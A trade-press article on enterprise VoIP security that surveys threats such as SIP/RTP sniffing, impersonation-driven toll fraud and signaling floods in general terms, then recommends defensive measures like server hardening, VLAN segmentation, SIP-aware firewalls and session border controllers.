VoIP has finally arrived as a mainstream application, so security is important when you're replacing the world's oldest, largest and most resilient and available communications network.
In fact, analysts predict that IP PBXs will account for more than 90% of the market by 2009. Before you deploy VoIP, however, you need to be aware of the security risks and the countermeasures that you can take.
Security is important in every context, but especially when you're replacing the world's oldest, largest and most resilient and available communications network. While no individual security measure will eliminate attacks against VoIP deployments entirely, a layered approach can meaningfully reduce the probability that attacks will succeed.
The threats
Enterprise VoIP customers and service providers are vulnerable to many of the same impersonation-based attacks "phreakers" attempt against traditional telephone and cellular services. The goals - identity and information theft and toll fraud - are the same.
Many attacks focus on VoIP endpoints. The operating systems, Internet protocols, applications and management interfaces of VoIP hard phones and computers running softphones are vulnerable to unauthorized access, viruses and worms, and many denial-of-service () attacks that exploit common Internet protocols and VoIP protocols themselves.
VoIP uses the IETF Session Initiation Protocol (SIP) and the Real-time Transport Protocol (RTP) for call signaling and voice-message delivery. These and complementing session description and RTP control protocols (SDP, RTCP) do not provide adequate call-party authentication, end-to-end integrity protection and confidentiality measures on call signaling and call data (such as media streams containing compressed and encoded speech). Until these security features are implemented and put into service, attackers have many vectors to exploit.
Today, SIP and RTP protocols do not encrypt call-signaling packets and voice streams, so identities, credentials and SIP Uniform Resource Identifiers (phone numbers) of callers can be captured using LAN and wireless LAN (WLAN) traffic-collection tools (sniffers).
An attacker can use captured account information to impersonate a user to a customer representative or self-service portal, where he can change the calling plan to permit calls to 900 numbers or to blocked international numbers. He also can access voice mail or change a call forwarding number.
Impersonation attacks commonly are used to perpetrate toll fraud, but financially motivated attackers also can capture voice conversations and later replay them to obtain sensitive business or personal information.
Flooding VoIP targets with SIP call-signaling messages (e.g., Invite, Register, Bye or RTP media stream packets) can degrade service, force calls to be dropped prematurely and render certain VoIP equipment incapable of processing calls entirely. VoIP equipment also may be vulnerable to DoS attacks against such Internet protocols as TCP SYN, ping of death and the recent DNS distributed DoS amplification attacks.
VoIP systems also can be disrupted by media-specific attacks, such as Ethernet broadcast storms and Wi-Fi radio jamming. Operating systems and stacks used in new VoIP hardware may be susceptible to implementation-specific attacks that exploit programming flaws. This can cause the system to cease operating or provide the attacker with remote administrative control of the system.
VoIP softphones pose a unique and thorny problem. Softphone applications run on user systems (PCs, PDAs) and thus are vulnerable to malicious code attacks against data and voice applications. IT administrators must consider the possibility that an attacker may try to evade conventional PC malware protection by injecting malicious code via a VoIP softphone application.
Spam often harbors spyware and remote administration tools. Spam over Internet telephony can carry unsolicited sales calls and other nuisance messages, and programs downloaded to softphones could include hidden malware.
Even this partial description should cause IT managers to assess the risk of introducing VoIP, and to develop a policy and an implementation plan to reduce the risks using security technology at hand.
Risk assessment
Voice is a perennial cash cow for traditional telephony service providers, a lucrative emerging market for VoIP vendors and a mission-critical service for businesses. Thus, the most serious risk public (carrier) and private (enterprise) VoIP operators must manage is service disruption.
VoIP users will expect no less than the high availability they are accustomed to receive from the public switched telephone network (PSTN). Accordingly, a thoughtful VoIP deployment plan for all would-be VoIP operators must include measures for reducing the threat of DoS attacks.
Other priority risks include identity theft and toll fraud. Public operators face a greater challenge than do PSTN and cellular carriers with identity and endpoint verification in VoIP deployment because endpoint IP addresses are generally not validated at Internet ingress points, and unlike public telephone numbers, there are as yet no widely adopted methods for VoIP operators to certify or assert cooperatively that a SIP identity is valid.
VoIP operators must manage trust relationships with other VoIP operators carefully and should avoid service arrangements unless they have some confidence that the other providers are using equivalent identity and endpoint verification methods. This might be arranged contractually across an extended enterprise or business-to-business VoIP deployment.
In general, insider attacks are more frequent than outsider attacks, so enterprise VoIP network operators must consider impersonation a threat even if they operate in isolation. Enterprise VoIP managers then must consider methods to detect and block impersonation attacks, and should maintain accounting and auditing tools to help detect abuse and identify perpetrators.
While public VoIP infrastructures may be more frequently targeted for politically motivated attacks and terrorism, private VoIP networks increasingly are at risk of electronic industrial espionage and eavesdropping attacks (for example, employees intercepting privileged calls).
Enterprise customers also must consider help desk and customer care. Service disruption, subscriber impersonation and toll fraud are serious support matters. Resolving disputes and restoring service to employees who are victims of such attacks sap resources and adversely affect productivity. The effects that security incidents may have on consumer, user, management and even shareholder confidence can be lasting.
Countermeasures
VoIP is a new and different type of Internet application, but ultimately it is another real-time data stream delivered using IP. Many of the security measures widely used today to protect other plain text applications, from telnet and FTP to Web, e-mail and instant messaging, can be used to improve VoIP security.
The majority of VoIP service applications are run on commercial server operating systems. Hardening servers and employing antitampering and host demonstrably improve an organization's baseline VoIP security. The most frequently recommended server security measures that can be applied to voice servers include:
- Maintain patch currency for operating system and VoIP applications.
- Run only applications required to provide and maintain VoIP services.
- Require strong authentication for administrative and user account access.
- Enable only user accounts required for maintenance and correct operation to deter forced break-ins.
- Implement stringent authorization policies to prevent unauthorized access to VoIP service and account data.
- Audit administrative and user sessions and service-related activities.
- Install and maintain server firewall, antimalware, and antitampering measures to deter DoS attacks.
- Securely configure VoIP applications to prevent misuse; for example, a whitelist of callable country codes can thwart certain call forward, transfer and social-engineering exploits that might result in toll fraud and unauthorized use.
Once VoIP servers and the applications they run are securely configured, build an in-depth defense by adding layers of security around servers. Isolate VoIP servers and required infrastructure (for example, DNS, ) from client machines (phones, PCs and laptops) by using separate physical or virtual LANs () to carry management, voice and data traffic.
Use firewalls to limit types of traffic that may cross VLAN boundaries to only those protocols necessary. This compartmentalization is especially effective in reducing the spread of malware from infected clients to VoIP servers in monoculture (such as Windows) networks. This often results in much simpler security policies in each compartmentalizing firewall than the policy you would have to maintain in a single firewall.
Segmentation is a powerful security tool, so don't stop here. The same segmentation methods used to heighten security can be used to implement QoS: For example, putting SIP phones on their own VLAN helps restrict VoIP to permitted devices and gives higher priority to VoIP as IP packets move from network edge to core.
Consider segregating voice user agents (hard phones) from PCs and laptops used to access networked data applications. This may prevent a successful attack against a data segment from spreading to and interfering with voice systems. Firewall performance may be an issue when applying segmentation and policy-based compartmentalization, so plan carefully to avoid adding latency to paths that will transport media streams.
Endpoint security adds an outer layer of security in VoIP deployments. IEEE port-based network access control and equivalent network admission techniques provide an additional layer of authorization control by blocking devices from using a LAN or WLAN until they pass security checks.
Administrators can choose to block devices infected with malware or that do not satisfy other admission criteria, such as current patches and appropriately configured firewalls. They can redirect noncompliant devices to an isolated LAN segment that offers limited services or to a LAN where softphone users can access software, patches and malware definition updates required to satisfy admission criteria. In many cases, these security measures can be performed before authentication, to prevent malware (keystroke loggers) from capturing user credentials.
Companies using firewalls to enforce security policy may discover that their current firewall is unsuited to the task of securing voice and data. Traditional network firewalls are designed to permit and deny traffic based on TCP, User Datagram Protocol () and IP header information: IP addresses, protocol types and port numbers, for example.
VoIP protocols use a large range of UDP ports and allocate them dynamically to media streams. Many traditional firewalls cannot accommodate this behavior without leaving large swaths of port numbers permanently open for VoIP use and other misuses. Certain firewalls do not process UDP efficiently. Others do not support QoS measures to manage latency and jitter so that VoIP calls have toll-voice quality.
IT administrators should consider firewalls that are SIP-aware, that can detect and counterattack against SIP signaling messages, and that can process RTP media streams without adding significant latency.
Application-layer gateways () can play a useful role in VoIP deployment. Incorporating tunnels into SIP proxies is becoming a popular way to improve authentication and add confidentiality and integrity protection on signaling messages exchanged between user agents and SIP proxies.
Many organizations are considering chaining SSL connections to protect signaling traffic between SIP proxies across their organizations and interorganizationally as well. RTP proxies may be appropriate if your organization must relay media streams among global and local RTP IP addresses and ports. Other organizations are choosing to take advantage of their investment in to secure VoIP traffic between sites.
In some configurations, organizations may try to process VoIP traffic preferentially by creating IPSec security associations that prioritize voice traffic over data. Some organizations may want to filter signaling traffic and RTP media streams through a Session Border Controller (SBC). SBCs operate as back-to-back user agents, concatenating and applying policy to calls between public and private user agents. In some respects, an SBC behaves like a secure e-mail proxy. It can rewrite message headers to hide details of private networks (such as addresses), strip unknown and undesirable header SIP fields, and restrict called-party numbers. Because media traffic flows through an SBC, RTP policies can be enforced at them.
These security measures, along with a proactive security monitoring and intrusion-detection and -prevention plan, not only improve VoIP security, but can greatly reduce the risks to data networks as organizations introduces VoIP. Many of these measures will continue to be useful in deployments even after security enhancements are incorporated into VoIP protocols and architecture.
Piscitello is president of Core Competence, an ICANN SSAC Fellow and author, with Alan Johnston, of Understanding Voice over IP Security. He can be reached at dave@corecom.com.